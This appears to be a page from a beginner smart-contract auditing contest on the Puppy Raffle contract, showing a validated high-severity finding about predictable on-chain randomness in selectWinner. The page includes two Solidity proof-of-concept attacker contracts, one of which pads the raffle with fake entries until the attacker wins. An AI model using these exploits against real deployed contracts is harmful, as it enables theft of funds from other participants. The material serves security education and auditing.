Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Predictable selectWinner function that leads to manipulation

mgx96

Weak on-chain randomness in `selectWinner` allows winner manipulation

Description

selectWinner is meant to select a raffle winner and mint a puppy NFT of random rarity in a fair and unpredictable way.
Both the winner index and the rarity calculation rely entirely on block.timestamp, block.difficulty, and msg.sender — all of which are either known in advance or influenceable. A validator/miner can manipulate block.difficulty, and any caller knows msg.sender and can predict block.timestamp to within a small window.

@> uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

// ...

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood: High

selectWinner is a public function callable by anyone, including by an attacker who can time the call to a block they control or predict.
On proof-of-stake Ethereum, block.difficulty is replaced by block.prevrandao, which validators can influence by choosing to skip a slot — a known attack vector.

Impact: High

An attacker can guarantee winning every raffle by simulating the hash off-chain and only calling selectWinner when the result favours them.
An attacker can guarantee minting a legendary NFT every time, undermining the rarity system entirely.

Proof of Concept

The block.timestamp is deterministic by nature and allows for an easy prediction, all the attacker needs to do is to figure out which time mints them a legedary rarity NFT and they will exploit it

contract WinnerManipulator {

PuppyRaffle raffle;

constructor(PuppyRaffle _raffle) { raffle = _raffle; }

function tryWin() external {

// Simulate the same hash the contract will compute

uint256 winnerIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % raffle.players().length; // NOTE: players() would need to be exposed

// Only call selectWinner when we know we'll win

require(raffle.players(winnerIndex) == address(this), "Not our turn");

raffle.selectWinner();

}

Recommended Mitigation

Replace the on-chain RNG with Chainlink VRF for verifiable, tamper-proof randomness.

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ // Request randomness from Chainlink VRF and handle result in fulfillRandomWords() callback

+ uint256 requestId = COORDINATOR.requestRandomWords(keyHash, subscriptionId, 3, callbackGasLimit, 1);

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!